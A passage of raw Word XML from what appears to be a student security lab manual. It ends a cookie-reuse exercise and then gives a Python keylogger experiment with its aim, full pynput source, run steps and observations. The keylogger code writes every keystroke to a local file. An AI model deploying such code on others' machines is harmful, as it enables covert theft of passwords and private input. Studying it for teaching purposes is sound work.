        <w:t>Observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06314021" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Session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cookies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can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be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reused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75E16B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>No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additional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verification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(IP/device</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> binding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D531C42" w14:textId="526CAF51" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="009D58F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:rPr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ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cookies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lack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strong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protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FCD57" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="72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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242579BE" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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4CBC4085" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201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Creating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Keylogger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using </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0407A1" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="205"/>
        <w:ind w:left="448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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5991C" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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write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Python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script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that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captures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logs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keystrokes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from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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EF971F" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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execute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keylogging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script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observe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logged</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> keystrokes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8552D6" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="1395"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To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understand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potential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security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risks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associated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with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keyloggers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 importance of protecting against them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756145CE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Program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4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFE0E7" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5059"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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import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>Listener,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-1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Key </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "keylog.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23DB80" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1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def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on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA8B8AE" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="928" w:right="6172" w:hanging="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,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"a")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as</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-10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file: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1DCBA" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="928" w:right="6380" w:firstLine="239"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key.char</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-15"/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AttributeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19F01E" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301D9208" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="1408" w:right="6380" w:hanging="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if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==</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-15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Key.space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977FC4B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="1408" w:right="6380" w:hanging="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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==</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-15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Key.enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>("\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B16BCB7" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="exact"/>
        <w:ind w:left="116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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02526883" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5559" w:firstLine="959"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(f"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[{key.name}]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") def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E802DA0" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="928" w:right="7007" w:hanging="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if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==</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-15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Key.esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06632A46" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="688" w:right="2646" w:hanging="240"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Listener(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-9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on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)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as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listener: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25596D10" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E3FD69" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE50213" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BCFBC7" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE7BA43" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="002C8F28" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B9CA0A" w14:textId="36E166AB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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88C98F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spacing w:before="205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Open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text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editor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create a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new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Python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named </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>keylogger.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A94A65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Enter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given Python code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 file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 save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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2797B732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Ensure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that Python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 the</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2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pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> library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installed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on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BBCFA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Open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terminal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or command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prompt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directory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containing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file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D850F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Execute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program using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489659CE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 xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B001E02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spacing w:before="202"/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Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>some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characters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keyboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C1B53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t>Press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Esc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 stop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program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40012EDF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Open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keylog.txt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file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view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recorded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keystrokes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086FF430" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F77A60" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361EA3C5" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D8FD0" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Every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pressed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by the user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recorded in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keylog.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02F0D5" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Alphabetic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numeric characters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logged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directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE0628" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
